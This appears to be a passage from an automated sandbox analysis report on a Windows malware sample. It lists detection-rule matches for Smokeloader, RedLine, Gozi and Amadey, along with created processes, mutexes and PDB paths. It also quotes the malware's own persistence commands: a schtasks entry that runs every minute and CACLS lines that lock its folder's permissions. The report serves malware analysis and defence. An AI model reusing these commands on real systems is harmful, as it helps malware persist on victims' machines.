                      Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                      Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                      Source: 86EE.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 8C00.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2B4A.exe.1.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: 453D.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: S2XJ2wbz7u.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tiddsjjJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@67/30@58/22
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\S2XJ2wbz7u.exe C:\Users\user\Desktop\S2XJ2wbz7u.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tiddsjj C:\Users\user\AppData\Roaming\tiddsjj
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeProcess created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeProcess created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2B4A.tmpJump to behavior
                      Source: 86EE.exe, 0000002D.00000003.493869220.00000000273B2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492502087.00000000273B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE offer_eligible_instrument ( offer_id UNSIGNED LONG,instrument_id UNSIGNED LONG),;' 4;'*
                      Source: 86EE.exe, 0000002D.00000003.490197880.00000000273B4000.00000004.00000800.00020000.00000000.sdmp, 95786452850497366982696300.45.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B48AD6 CreateToolhelp32Snapshot,Module32First,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\E3ECD25DF9
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCommand line argument: 08A
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.csCryptographic APIs: 'CreateDecryptor'
                      Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.csCryptographic APIs: 'TransformFinalBlock'
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: S2XJ2wbz7u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
                      Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
                      Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
                      Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
                      Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
                      Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
                      Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
                      Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
                      Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
                      Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr

                      Data Obfuscation

                      barindex
